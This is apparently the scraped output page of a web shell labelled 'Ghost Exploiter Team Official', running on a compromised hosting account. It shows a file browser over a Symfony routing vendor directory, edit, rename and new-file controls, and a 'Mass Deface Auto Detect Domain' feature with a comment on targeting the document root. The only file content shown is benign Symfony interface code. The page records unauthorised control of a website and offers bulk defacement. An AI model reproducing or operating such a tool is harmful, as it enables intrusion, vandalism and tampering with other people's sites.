webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
symfony
/
routing
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Annotation
--
ren
Attribute
--
ren
DependencyInjection
--
ren
Exception
--
ren
Generator
--
ren
Loader
--
ren
Matcher
--
ren
Requirement
--
ren
Alias.php
2.502KB
edt
ren
CHANGELOG.md
13.505KB
edt
ren
CompiledRoute.php
4.141KB
edt
ren
LICENSE
1.043KB
edt
ren
README.md
1.93KB
edt
ren
RequestContext.php
6.575KB
edt
ren
RequestContextAwareInte
...
0.539KB
edt
ren
Route.php
11.992KB
edt
ren
RouteCollection.php
10.785KB
edt
ren
RouteCompiler.php
14.408KB
edt
ren
RouteCompilerInterface.php
0.716KB
edt
ren
Router.php
11.706KB
edt
ren
RouterInterface.php
0.991KB
edt
ren
composer.json
1.277KB
edt
ren
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Routing; use Symfony\Component\Routing\Generator\UrlGeneratorInterface; use Symfony\Component\Routing\Matcher\UrlMatcherInterface; /** * RouterInterface is the interface that all Router classes must implement. * * This interface is the concatenation of UrlMatcherInterface and UrlGeneratorInterface. * * @author Fabien Potencier <fabien@symfony.com> */ interface RouterInterface extends UrlMatcherInterface, UrlGeneratorInterface { /** * Gets the RouteCollection instance associated with this Router. * * WARNING: This method should never be used at runtime as it is SLOW. * You might use it in a cache warmer though. * * @return RouteCollection */ public function getRouteCollection(); }